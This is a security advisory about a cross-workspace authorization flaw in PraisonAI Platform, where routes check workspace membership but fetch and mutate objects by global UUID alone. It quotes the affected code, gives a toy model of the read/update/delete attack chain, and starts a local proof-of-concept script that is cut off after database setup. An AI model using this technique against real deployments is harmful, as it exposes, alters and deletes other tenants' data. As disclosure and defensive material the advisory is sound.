PraisonAI Platform workspace-scoped routes allow cross-workspace object access by global object ID
Vulnerability description
### Summary

PraisonAI Platform's workspace-scoped REST routes contain a systemic object-level authorization flaw that allows an authenticated user from one workspace to access, modify, and delete objects belonging to another workspace by supplying the victim object's global UUID.

The affected pattern appears in workspace-scoped routes such as agents, projects, issues, and comments. The route layer verifies that the caller is a member of the `workspace_id` provided in the URL, but the service layer later resolves the target object by global object ID only. It does not verify that the resolved object actually belongs to the workspace in the URL.

As a result, a valid member of `workspace_attacker` can call a route under:

```text
/api/v1/workspaces/{workspace_attacker}/...
```

while supplying an object UUID from `workspace_victim`. The server authorizes the request based on membership in `workspace_attacker`, then fetches or mutates the victim object by global UUID.

This breaks the platform's workspace isolation boundary.

### Details

The root cause is that workspace membership authorization and object ownership validation are not bound together.

The workspace dependency validates only that the caller is a member of the workspace named in the URL:

```python
# praisonai_platform/api/deps.py

async def require_workspace_member(
    workspace_id: str,
    user: AuthIdentity = Depends(get_current_user),
    session: AsyncSession = Depends(get_db),
    min_role: str = "member",
) -> AuthIdentity:
    member_svc = MemberService(session)
    has = await member_svc.has_role(workspace_id, user.id, min_role)
```

This confirms that the caller has access to the URL workspace. However, it does not prove that the target object belongs to that workspace.
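The difference between the two checks can be illustrated with a minimal, self-contained model. Everything in it (`MEMBERS`, `AGENTS`, `is_member`, `object_in_workspace`) is hypothetical and stands in for the platform's database and services. It is only a sketch of why a successful membership check says nothing about which workspace an object belongs to.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Agent:
    id: str
    workspace_id: str
    name: str


# Hypothetical in-memory stand-ins for the membership and agent tables.
MEMBERS = {("ws_attacker", "attacker"), ("ws_victim", "victim")}
AGENTS = {"agent-victim-1": Agent("agent-victim-1", "ws_victim", "victim agent")}


def is_member(workspace_id: str, user_id: str) -> bool:
    """Membership check: inspects only the (workspace, user) pair."""
    return (workspace_id, user_id) in MEMBERS


def object_in_workspace(workspace_id: str, agent_id: str) -> bool:
    """Ownership check: inspects the workspace recorded on the object itself."""
    agent = AGENTS.get(agent_id)
    return agent is not None and agent.workspace_id == workspace_id


# The attacker names their own workspace in the URL and the victim's agent ID.
membership_ok = is_member("ws_attacker", "attacker")
ownership_ok = object_in_workspace("ws_attacker", "agent-victim-1")
print(membership_ok, ownership_ok)
```

In this model the membership check succeeds while the ownership check fails, so a handler that consults only the first would proceed with an object from another workspace.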
For example, the agent routes are scoped under a workspace path, but object access is performed using only the raw `agent_id`:

```python
# praisonai_platform/api/routes/agents.py

@router.get("/{agent_id}", response_model=AgentResponse)
async def get_agent(workspace_id: str, agent_id: str, ...):
    agent = await svc.get(agent_id)
    return AgentResponse.model_validate(agent)
```

The service method resolves the agent by global UUID only:

```python
# praisonai_platform/services/agent_service.py

async def get(self, agent_id: str) -> Optional[Agent]:
    return await self._session.get(Agent, agent_id)
```

The same pattern is used for update and delete operations:

```python
# praisonai_platform/api/routes/agents.py

agent = await svc.update(agent_id, ...)
deleted = await svc.delete(agent_id)
```

```python
# praisonai_platform/services/agent_service.py

agent = await self.get(agent_id)
...
await self._session.delete(agent)
```

There is no check equivalent to:

```python
agent.workspace_id == workspace_id
```

Therefore, if an attacker is a valid member of any workspace, they can pass their own workspace ID in the URL while supplying an object ID from another workspace.

The same architectural pattern appears in other workspace-scoped object routes, including projects, issues, and comments:

```python
# praisonai_platform/api/routes/projects.py

project = await svc.get(project_id)
project = await svc.update(project_id, ...)
deleted = await svc.delete(project_id)
```

```python
# praisonai_platform/services/project_service.py

return await self._session.get(Project, project_id)
```

```python
# praisonai_platform/api/routes/issues.py

issue = await svc.get(issue_id)
issue = await svc.update(issue_id, ...)
deleted = await svc.delete(issue_id)
comments = await svc.list_for_issue(issue_id)
```

```python
# praisonai_platform/services/issue_service.py

return await self._session.get(Issue, issue_id)
```

```python
# praisonai_platform/services/comment_service.py

select(Comment).where(Comment.issue_id == issue_id)
```

This indicates a systemic object-level access control issue: routes are workspace-scoped, but service-layer object lookups are not workspace-bound.

### PoC

The following local PoC creates a real PraisonAI Platform FastAPI app backed by an in-memory SQLite database, then uses only HTTP requests against the real API routes.

The PoC demonstrates the following chain:

1. An attacker account creates `workspace_attacker`.
2. A victim account creates `workspace_victim`.
3. The victim creates an agent in `workspace_victim`.
4. The attacker sends:

   ```text
   GET /api/v1/workspaces/{workspace_attacker}/agents/{victim_agent_id}
   ```

5. The server returns the victim agent from `workspace_victim`.
6. The attacker updates the victim agent through the attacker workspace path.
7. The victim observes the attacker-controlled modification.
8. The attacker deletes the victim agent through the attacker workspace path.
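Before turning to the real application, the read, update, and delete steps of this chain can be modeled in isolation. The sketch below is a toy, in-memory stand-in and not the platform's code: `ToyPlatform`, `run_chain`, and the `bind_to_workspace` flag are hypothetical names introduced only for illustration. With the flag off, lookups use the global ID alone, mirroring the pattern described under Details. With the flag on, the lookup also compares the object's `workspace_id` with the workspace in the URL, which is one possible shape of a fix under these assumptions.

```python
from __future__ import annotations

import uuid


class NotFound(Exception):
    """Raised when a lookup yields no object visible to the caller."""


class Forbidden(Exception):
    """Raised when the caller is not a member of the URL workspace."""


class ToyPlatform:
    """Hypothetical in-memory model; not the platform's real services."""

    def __init__(self, bind_to_workspace: bool) -> None:
        self.bind_to_workspace = bind_to_workspace
        self.members: set[tuple[str, str]] = set()
        self.agents: dict[str, dict[str, str]] = {}

    def create_workspace(self, user: str) -> str:
        workspace_id = str(uuid.uuid4())
        self.members.add((workspace_id, user))
        return workspace_id

    def _require_member(self, workspace_id: str, user: str) -> None:
        if (workspace_id, user) not in self.members:
            raise Forbidden(workspace_id)

    def _lookup(self, workspace_id: str, agent_id: str) -> dict[str, str]:
        agent = self.agents.get(agent_id)  # resolved by global ID
        if agent is None:
            raise NotFound(agent_id)
        # The ownership check that the vulnerable pattern omits.
        if self.bind_to_workspace and agent["workspace_id"] != workspace_id:
            raise NotFound(agent_id)
        return agent

    def create_agent(self, workspace_id: str, user: str, name: str) -> str:
        self._require_member(workspace_id, user)
        agent_id = str(uuid.uuid4())
        self.agents[agent_id] = {"id": agent_id, "workspace_id": workspace_id, "name": name}
        return agent_id

    def get_agent(self, workspace_id: str, user: str, agent_id: str) -> dict[str, str]:
        self._require_member(workspace_id, user)
        return self._lookup(workspace_id, agent_id)

    def update_agent(self, workspace_id: str, user: str, agent_id: str, name: str) -> None:
        self._require_member(workspace_id, user)
        self._lookup(workspace_id, agent_id)["name"] = name

    def delete_agent(self, workspace_id: str, user: str, agent_id: str) -> None:
        self._require_member(workspace_id, user)
        del self.agents[self._lookup(workspace_id, agent_id)["id"]]


def run_chain(platform: ToyPlatform) -> list[str]:
    """Replay the attacker's read, update, and delete attempts."""
    ws_attacker = platform.create_workspace("attacker")
    ws_victim = platform.create_workspace("victim")
    agent_id = platform.create_agent(ws_victim, "victim", "victim-agent")
    steps = [
        ("read", lambda: platform.get_agent(ws_attacker, "attacker", agent_id)),
        ("update", lambda: platform.update_agent(ws_attacker, "attacker", agent_id, "pwned")),
        ("delete", lambda: platform.delete_agent(ws_attacker, "attacker", agent_id)),
    ]
    outcomes = []
    for label, action in steps:
        try:
            action()
            outcomes.append(f"{label}: allowed")
        except NotFound:
            outcomes.append(f"{label}: not found")
    return outcomes


vulnerable = run_chain(ToyPlatform(bind_to_workspace=False))
bound = run_chain(ToyPlatform(bind_to_workspace=True))
print(vulnerable)
print(bound)
```

In the toy model, a cross-workspace lookup is reported as not found rather than forbidden, so the response does not confirm that the ID exists in another workspace. Whether that is the right behavior for the real platform is a design decision for its maintainers.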
Run with:

```bash
PRAISONAI_REPO=/path/to/PraisonAI python -B embedded_poc.py
```

Full PoC:

```python
#!/usr/bin/env python3
from __future__ import annotations

import asyncio
import os
import sys
import types
import uuid
from pathlib import Path

from httpx import ASGITransport, AsyncClient
from sqlalchemy.ext.asyncio import create_async_engine

REPO_ROOT = Path(os.environ.get("PRAISONAI_REPO", "/path/to/PraisonAI")).resolve()
PLATFORM_ROOT = REPO_ROOT / "src" / "praisonai-platform"
AGENTS_ROOT = REPO_ROOT / "src" / "praisonai-agents"


def verify_source() -> None:
    expected = {
        PLATFORM_ROOT / "praisonai_platform/api/deps.py": [
            'min_role: str = "member"',
            "member_svc.has_role(workspace_id, user.id, min_role)",
        ],
        PLATFORM_ROOT / "praisonai_platform/api/routes/agents.py": [
            '@router.get("/{agent_id}", response_model=AgentResponse)',
            "agent = await svc.get(agent_id)",
            '@router.patch("/{agent_id}", response_model=AgentResponse)',
            "agent = await svc.update(",
            '@router.delete("/{agent_id}", status_code=status.HTTP_204_NO_CONTENT)',
            "deleted = await svc.delete(agent_id)",
        ],
        PLATFORM_ROOT / "praisonai_platform/services/agent_service.py": [
            "return await self._session.get(Agent, agent_id)",
            "agent = await self.get(agent_id)",
            "await self._session.delete(agent)",
        ],
    }

    for path, needles in expected.items():
        if not path.exists():
            raise RuntimeError(f"source verification failed: file not found: {path}")
        text = path.read_text(encoding="utf-8")
        for needle in needles:
            if needle not in text:
                raise RuntimeError(f"source verification failed: {needle!r} not found in {path}")


async def main() -> int:
    verify_source()

    sys.path.insert(0, str(PLATFORM_ROOT))
    sys.path.insert(0, str(AGENTS_ROOT))

    if "passlib" not in sys.modules:
        passlib_pkg = types.ModuleType("passlib")
        passlib_pkg.__path__ = []
        sys.modules["passlib"] = passlib_pkg

    if "passlib.context" not in sys.modules:
        passlib_context = types.ModuleType("passlib.context")

        class _CryptContext:
            def __init__(self, *args, **kwargs):
                pass

            def hash(self, password: str) -> str:
                return f"stub::{password}"

            def verify(self, password: str, hashed: str) -> bool:
                return hashed == f"stub::{password}"

        passlib_context.CryptContext = _CryptContext
        sys.modules["passlib.context"] = passlib_context

    os.environ["PLATFORM_JWT_SECRET"] = "test-secret-for-testing-only"

    from praisonai_platform.api.app import create_app
    from praisonai_platform.db.base import Base, reset_engine
    from praisonai_platform.db import base as base_mod

    await reset_engine()
    engine = create_async_engine(
        "sqlite+aiosqlite:///:memory:",
        echo=False,
        connect_args={"check_same_thread": False},
    )
    base_mod._engine = engine
    base_mod._session_factory = None

    async with engine.begin() as conn:
        await conn.run_sync(Base.metadata.create_all)